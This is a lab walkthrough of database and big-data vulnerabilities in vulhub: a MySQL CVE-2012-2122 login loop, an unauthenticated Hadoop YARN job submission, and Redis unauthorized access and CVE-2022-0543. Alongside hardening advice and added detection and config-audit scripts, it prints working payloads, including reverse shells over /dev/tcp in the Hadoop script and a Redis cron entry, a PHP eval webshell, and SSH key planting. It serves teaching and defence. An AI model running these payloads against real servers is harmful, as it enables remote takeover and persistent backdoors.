Directory
- Database Security – Redis & Hadoop & MySQL unauthorized access & RCE
  - Definition
  - Vulnerability reproduction
    - MySQL CVE-2012-2122 vulnerability
    - Hadoop improper configuration: unauthorized access trio & RCE vulnerability
    - Redis unauthorized access: webshell & scheduled task & key & RCE, etc.
      - Vulnerability definition
      - Vulnerability causes
      - Vulnerability hazards
      - Vulnerability reproduction
        - Redis unauthorized access: webshell & scheduled task & key & RCE
        - Redis command execution (RCE)
        - Redis sandbox bypass (CVE-2022-0543)
  - Reinforcement ideas
Database Security – Redis & Hadoop & MySQL unauthorized access & RCE
Definition
An unauthorized access vulnerability is a flaw in an address or page that should require security configuration or permission authentication but can be reached directly by any user. It allows privileged operations to be performed and sensitive information such as database contents or website directories to be leaked. Common cases are unauthenticated service ports and unprotected admin pages such as /admin.php or /menu.php.
Common unauthorized access vulnerabilities and their default ports:
Default port list: [21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088, 8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017], etc.
Vulnerability reproduction
MySQL CVE-2012-2122 vulnerability
Lab environment: vulhub
Start the environment and run the payload.
Send login requests continuously in a loop:

```bash
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306; done
```

After the loop has run for a while, one of the attempts is accepted and drops straight into the database.
Successful entry:
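The loop above works because, on affected builds, a small fraction of wrong-password attempts is accepted anyway, so what a defender sees is a burst of failed logins from one client followed by a success. The following added example (not part of the original post or of vulhub) detects that pattern in constructed log lines; the line format (modelled on a MySQL general log with "Connect" records), the thresholds, and the host addresses are assumptions to adapt to your own server's output.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Line shapes this example assumes; adjust to your own server's log format.
TS_RE = re.compile(r"^(\d{6} +\d{1,2}:\d{2}:\d{2})")
FAIL_RE = re.compile(r"Access denied for user '([^']+)'@'([^']+)'")
OK_RE = re.compile(r"Connect\s+([^@\s]+)@(\S+) on")


def build_sample_log():
    """Constructed sample: 300 failed root logins from one client within 30 s,
    then one success (the CVE-2012-2122 signature), plus two admin typos."""
    base = datetime(2013, 6, 25, 10, 15, 11)
    lines = []
    for i in range(300):
        ts = (base + timedelta(seconds=i // 10)).strftime("%y%m%d %H:%M:%S")
        lines.append(f"{ts}\t{i + 5} Connect\tAccess denied for user 'root'@'192.168.100.1' (using password: YES)")
    ts = (base + timedelta(seconds=30)).strftime("%y%m%d %H:%M:%S")
    lines.append(f"{ts}\t305 Connect\troot@192.168.100.1 on")
    for sec in (0, 90):  # two isolated failures from an admin host: not a burst
        ts = (base + timedelta(seconds=sec)).strftime("%y%m%d %H:%M:%S")
        lines.append(f"{ts}\t400 Connect\tAccess denied for user 'admin'@'10.0.0.7' (using password: YES)")
    return "\n".join(lines)


def parse_events(log_text):
    """Turn log lines into (time, host, user, success) tuples; other lines are ignored."""
    events = []
    for line in log_text.splitlines():
        m = TS_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%y%m%d %H:%M:%S")
        fail = FAIL_RE.search(line)
        if fail:
            events.append((ts, fail.group(2), fail.group(1), False))
            continue
        ok = OK_RE.search(line)
        if ok:
            events.append((ts, ok.group(2), ok.group(1), True))
    return events


def detect_login_bursts(events, threshold=50, window=timedelta(seconds=60)):
    """Report hosts with at least `threshold` failed logins inside any `window`,
    and whether a successful login followed the burst (the high-severity case)."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev[1]].append(ev)
    findings = {}
    for host, evs in by_host.items():
        fails = sorted(e[0] for e in evs if not e[3])
        peak, start = 0, 0
        for end, t in enumerate(fails):  # sliding window over failure times
            while t - fails[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        successes = [e[0] for e in evs if e[3]]
        success_after = any(fails[0] <= s <= fails[-1] + window for s in successes)
        findings[host] = {
            "failures": len(fails),
            "peak_in_window": peak,
            "success_after_burst": success_after,
            "users": sorted({e[2] for e in evs if not e[3]}),
        }
    return findings


if __name__ == "__main__":
    for host, info in detect_login_bursts(parse_events(build_sample_log())).items():
        print(host, info)
```

A host that trips the threshold and then logs in successfully deserves an immediate look at the server version and the account; an isolated burst with no success is ordinary brute forcing and still worth blocking at the firewall.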
Hadoop improper configuration: unauthorized access trio & RCE vulnerability
Lab environment: vulhub
Start the environment.
Payload:

```python
#!/usr/bin/env python
import requests

target = 'http://192.168.100.134:8088/'
lhost = '192.168.100.1'  # put your local host ip here, and listen at port 9999

# Ask the ResourceManager REST API (no authentication) for a new application id
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']

# Submit an application whose ApplicationMaster container runs the given command
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
```

Start a listener on the attack side:

```bash
nc -lvvp 9999
```

Run the Python script:
Reverse shell received.
Commands can now be executed:
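The script above succeeds because the ResourceManager REST API answers unauthenticated requests. As an added example that is not part of the original post, the following Python audits constructed core-site.xml and yarn-site.xml fragments for the settings that leave the web endpoints and application submission open; the property names and their defaults are taken from the Hadoop configuration documentation, and the sample values (host names, ACL users) are constructed.

```python
import xml.etree.ElementTree as ET

# (property, default when absent, check the effective value must pass, problem text).
# Defaults follow Hadoop's core-default.xml / yarn-default.xml documentation.
CHECKS = [
    ("hadoop.security.authentication", "simple", lambda v: v == "kerberos",
     "RPC authentication is 'simple': any client can claim any user name"),
    ("hadoop.http.authentication.type", "simple", lambda v: v == "kerberos",
     "web/REST endpoints (e.g. the ResourceManager on 8088) accept unauthenticated requests"),
    ("hadoop.http.authentication.simple.anonymous.allowed", "true", lambda v: v == "false",
     "anonymous HTTP users are allowed"),
    ("yarn.acl.enable", "false", lambda v: v == "true",
     "YARN ACLs are disabled, so application submission is not access-controlled"),
    ("yarn.admin.acl", "*", lambda v: v != "*",
     "yarn.admin.acl is '*': every user is a YARN administrator"),
]

# Constructed *-site.xml fragments (not the lab's files): a weak pair and a hardened pair.
WEAK_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
</configuration>"""
WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.hostname</name><value>resourcemanager</value></property>
</configuration>"""
HARDENED_CORE_SITE = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.simple.anonymous.allowed</name><value>false</value></property>
</configuration>"""
HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.hostname</name><value>resourcemanager</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>yarn,hdfs</value></property>
</configuration>"""


def load_properties(xml_text):
    """Parse a Hadoop *-site.xml into a {name: value} dict."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_hadoop(core_site_xml, yarn_site_xml):
    """Return (property, effective value, problem) for each weak setting.
    Hadoop merges its *-site.xml files, so both are read into one dict."""
    props = {**load_properties(core_site_xml), **load_properties(yarn_site_xml)}
    findings = []
    for name, default, passes, problem in CHECKS:
        value = props.get(name, default).lower()
        if not passes(value):
            findings.append((name, value, problem))
    return findings


if __name__ == "__main__":
    for name, value, problem in audit_hadoop(WEAK_CORE_SITE, WEAK_YARN_SITE):
        print(f"[weak] {name}={value!r}: {problem}")
    print("hardened:", audit_hadoop(HARDENED_CORE_SITE, HARDENED_YARN_SITE))
```

Turning on Kerberos for the HTTP endpoints is the change that stops the unauthenticated submission itself; the ACL settings limit what an authenticated user can do afterwards, and a firewall in front of 8088 is still needed on any host that cannot run with Kerberos.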
Redis unauthorized access: webshell & task & key & RCE, etc.
Redis is a very fast, open-source, network-enabled, in-memory, persistent, log-type, non-relational database.
It provides APIs for multiple languages: Java, C, C++, C#, PHP, JavaScript, etc.
Vulnerability definition:
The Redis unauthorized access vulnerability arises when a Redis server runs an older version and has no login password configured. An attacker who knows the server's IP address and port can log in to it remotely and then use that access to take control of the target server.
Vulnerability causes
1. Redis version 4.x / 5.0.5 or earlier.
2. Redis is bound to 0.0.0.0:6379 with no firewall rules or other security policies restricting untrusted source IPs, so the service is exposed directly to the public network.
3. No password authentication is configured (the password is usually empty), so the Redis service can be logged into remotely without a password.
Vulnerability hazards
An attacker can use Redis commands to write a scheduled task to the target server that spawns a reverse shell and so take control of the server; write a webshell into the website directory to gain initial control of the web server; and, most seriously, if Redis runs as root, write an SSH public key into the root account's key file and log in to the victim server directly over SSH.
Vulnerability reproduction
Redis unauthorized access: webshell & scheduled task & key & RCE
Vulnerability verification:
Verification idea:
The essence of the unauthorized access vulnerability is that a login can be completed without a password, so verification is simple: if the attack machine can log in to the target server without a password, the vulnerability exists.
On the server side, start the Redis service.
On the attack machine, connect to the Redis server: redis-cli -h IP
After logging in, run info; if the server information is returned, the verification succeeded.
Exploitation:
Exploitation methods

1. Write a scheduled task to get a reverse shell
Process: the target runs the Redis server; the attack machine connects to it and writes a scheduled task into the server.

```
config set dir /var/spool/cron
config set dbfilename root
set ssr "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attackIP/1234 0>&1\n\n"
save
```

config set dir sets the write directory to the cron spool folder; config set dbfilename sets the file name to write (the name can be customised); set ssr sets the content to write; save writes it out.
On the attack machine, run nc -lvvp 1234 and wait a moment; it receives the target's shell. Use crontab -l on the target to view the scheduled task that was written.

2. Write a webshell

```
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php @eval($_POST['cmd']); ?>"
save
```

The set webshell line is the webshell backdoor.

3. Write an SSH public key to log in
1) Start the SSH service on the attack machine and on the target. Command: systemctl start ssh (install it with apt or yum if it is missing).
2) Create a writable SSH public key directory on the target. Command: mkdir /root/.ssh (check with ls -al that it was created).
3) Clear the files in /root/.ssh on the attack machine so that the key files generated later are easy to identify. Command (inside that directory): rm -rf *
4) Generate the SSH key pair on the attack machine (press Enter three times). Command: ssh-keygen -t rsa
5) Change to the public key directory on the attack machine. Command: cd /root/.ssh
6) Write the public key to 1.txt, with \n\n before and after it so that it does not merge with other cached data in Redis (otherwise the login always fails):

```
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
```

Load the contents of 1.txt into the target Redis server, then point the target file at the right place and write it.
Command: cat 1.txt | redis-cli -h targetIP -x set crack (stores the content of 1.txt under the key crack; the name can be customised).
Connect with redis-cli -h targetIP and run the following commands to write the local SSH public key to the target machine:

```
config set dir /root/.ssh
config get dir
config set dbfilename authorized_keys
save
```

Log in from the attack machine over SSH without a password:

```
cd /root/.ssh
ssh -i id_rsa root@targetIP
```
Redis command execution (RCE)
Lab environment: vulhub
Start the environment, connect, and run info; the returned output shows the server is accessible without authorization.
Automated tool usage:
Use the tool directly.
Tool address:
Payload:

```bash
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"
```

Result:
Try another command:
whoami
Command executed successfully.
The command can also be replaced with a reverse shell command to get a reverse shell.
Redis sandbox bypass (CVE-2022-0543)
Lab environment: vulhub
Start the environment.
Payload:

```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
```

The command passed to io.popen can also be switched to a reverse shell command.
Result:
Reinforcement ideas
1. Upgrade Redis to a patched version.
2. Change the default port 6379.
3. Set up password authentication.
4. Set up a firewall so that only trusted source IPs can reach the port.
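To turn the four reinforcement ideas above (and the three causes listed earlier) into a repeatable check, the following added example (not part of the original post) audits a redis.conf for the directives that matter here: bind, port, protected-mode, requirepass, rename-command for CONFIG and MODULE, and enable-module-command (Redis 7 and later). Both configuration fragments are constructed, the password is a placeholder, and the 16-character minimum is this example's own threshold rather than a Redis rule.

```python
import shlex

# Constructed redis.conf fragments (not from the page's lab). The password is
# a placeholder to be replaced with a long random secret.
WEAK_CONF = """\
bind 0.0.0.0
port 6379
protected-mode no
"""
HARDENED_CONF = """\
bind 127.0.0.1
port 16379
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET-0123456789
rename-command CONFIG ""
rename-command MODULE ""
enable-module-command no
"""


def parse_redis_conf(text):
    """Return a list of (directive, args) pairs; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the "" used to disable a command
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def audit_redis_conf(text, min_password_len=16):
    """Return a list of human-readable findings for weak settings in a redis.conf."""
    values, renamed_to_empty = {}, set()
    for directive, args in parse_redis_conf(text):
        if directive == "rename-command" and len(args) == 2 and args[1] == "":
            renamed_to_empty.add(args[0].upper())
        else:
            values[directive] = args
    findings = []

    bind = values.get("bind")
    if bind is None:
        findings.append("no bind directive: older versions listen on all interfaces by default")
    elif any(a in ("0.0.0.0", "::") or a.startswith("*") for a in bind):
        findings.append(f"bind {' '.join(bind)}: listens on every interface")

    if values.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode no: remote clients are not refused when no password is set")

    password = values.get("requirepass", [""])
    if not password or not password[0]:
        findings.append("requirepass missing: anyone who can reach the port can log in")
    elif len(password[0]) < min_password_len:
        findings.append(f"requirepass is only {len(password[0])} characters "
                        f"(this check requires at least {min_password_len})")

    if values.get("port", ["6379"])[0] == "6379":
        findings.append("port 6379: the default port, the first thing scanners look for")

    if "CONFIG" not in renamed_to_empty:
        findings.append("CONFIG reachable: dir and dbfilename can be redirected to write files")

    module_cmd = values.get("enable-module-command")
    if "MODULE" not in renamed_to_empty and (module_cmd is None or module_cmd[0].lower() != "no"):
        findings.append("MODULE LOAD not disabled: rename it, or set enable-module-command no on Redis 7+")
    return findings


if __name__ == "__main__":
    for finding in audit_redis_conf(WEAK_CONF):
        print("[weak]", finding)
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Redis 6 and later can replace requirepass with ACL user directives; this check does not parse those, so extend it if your deployment relies on ACLs. The port change is the weakest of the four measures on its own, which is why the check reports it alongside the others rather than treating it as sufficient.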